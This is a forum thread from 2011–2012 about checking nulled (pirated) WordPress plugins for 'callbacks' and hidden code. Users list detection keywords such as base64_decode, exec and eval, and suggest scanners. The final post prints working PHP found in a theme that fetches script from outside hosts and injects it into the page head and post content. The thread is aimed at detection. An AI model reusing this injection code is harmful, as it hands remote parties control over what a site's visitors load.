Callback/Null Script checker

Gamboloyd · Nov 29, 2011

Hi folks. Is there any way to check online if a plugin has callbacks in it? I'm sure I read it in a thread here ages ago but for the love of all things shiny I can't find it. Any ideas?

JohnsonDaniel · Nov 29, 2011

Gamboloyd said:
Hi folks. Is there any way to check online if a plugin has callbacks in it? I'm sure I read it in a thread here ages ago but for the love of all things shiny I can't find it. Any ideas?

TAC (theme authenticity checker) will do a check of your theme (you'll find it via the WP plugins repository), but not 100% sure if it checks plugin files also.

There's also an Antivirus for WP (again, from general repository), which, afaik, checks ALL of your WP files for virii or malware.

Gamboloyd · Nov 29, 2011

Thanks. Needed to know as I keep wondering if some of the nulled software I acquire is doing anything dubious.

imth3one · Nov 29, 2011

This is probably complicated but you'll be sure.

Install the script on your localhost and use a http sniffer to monitor the requests.

ESM2012 · Nov 29, 2011

Excuse my ignorance, but what does a callback actually do?

paincake · Nov 29, 2011

One way would be to search all files for these functions (one at a time):

PHP:

file_get_contents
http_get
curl_exec
base64_decode
exec

TZ2011 · Nov 29, 2011

paincake said:
One way would be to search all files for these functions (one at a time):

PHP:

file_get_contents http_get curl_exec base64_decode exec

Exactly. Also look for http://
I use FileSeek from

Code:

http://www.fileseek.ca/

, nice freeware with extra functions, looking for lines in all files and listing them for further editing.

Gamboloyd · Nov 30, 2011

Thanks loads folks. I will check out your suggestions. No harm in a bit of healthy paranoia

synergyxtr · Nov 30, 2011

ESM2012 said:
Excuse my ignorance, but what does a callback actually do?

When the software calls back its home website to monitor if we are using their software.

upl8t · Nov 30, 2011

ESM2012 said:
Excuse my ignorance, but what does a callback actually do?

Some plugins are licensed by domain or for a limited number of domains so the plugin communicates the serial number to the developer. This way he knows if it's being used where it shouldn't.

x-bassist · Nov 30, 2011

exploit scanner

Code:

http://wordpress.org/extend/plugins/exploit-scanner/

Nitros · Nov 30, 2011

paincake said:
One way would be to search all files for these functions (one at a time):

PHP:

file_get_contents http_get curl_exec base64_decode exec

and "eval" as money people are using javascript eval() function to hide something

kkvsam · Nov 30, 2011

If they encrypted the files , so how do we find it?
I think most of them are encrypted..

Markbh · Mar 3, 2012

@kkvsam

Try this link:

HTML:

http://ottodestruct.com/decoder.php

kkvsam said:
If they encrypted the files , so how do we find it?
I think most of them are encrypted..

SuperNoobInc · Mar 11, 2012

So what does a 'callback' script looks like;

For example, I just searched the entire folder for "curl_exec" and i found the following;

/*-----------------------------------------------------------------------------------*/
/* Directory
/*-----------------------------------------------------------------------------------*/if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
add_filter('the_content', 'ins_php_in_post');

Is this some sort of call back in this case? Please advise. Thanks

Callback/Null Script checker

Gamboloyd

Registered Member

JohnsonDaniel

Regular Member

Gamboloyd

Registered Member

imth3one

Newbie

ESM2012

Regular Member

paincake

Power Member

TZ2011

Senior Member

Gamboloyd

Registered Member

synergyxtr

Newbie

upl8t

Regular Member

x-bassist

Junior Member

Nitros

Power Member

kkvsam

Senior Member

Markbh

Regular Member

SuperNoobInc

BANNED

Main Menu

Marketplace

Making Money

BlackHatWorld

Other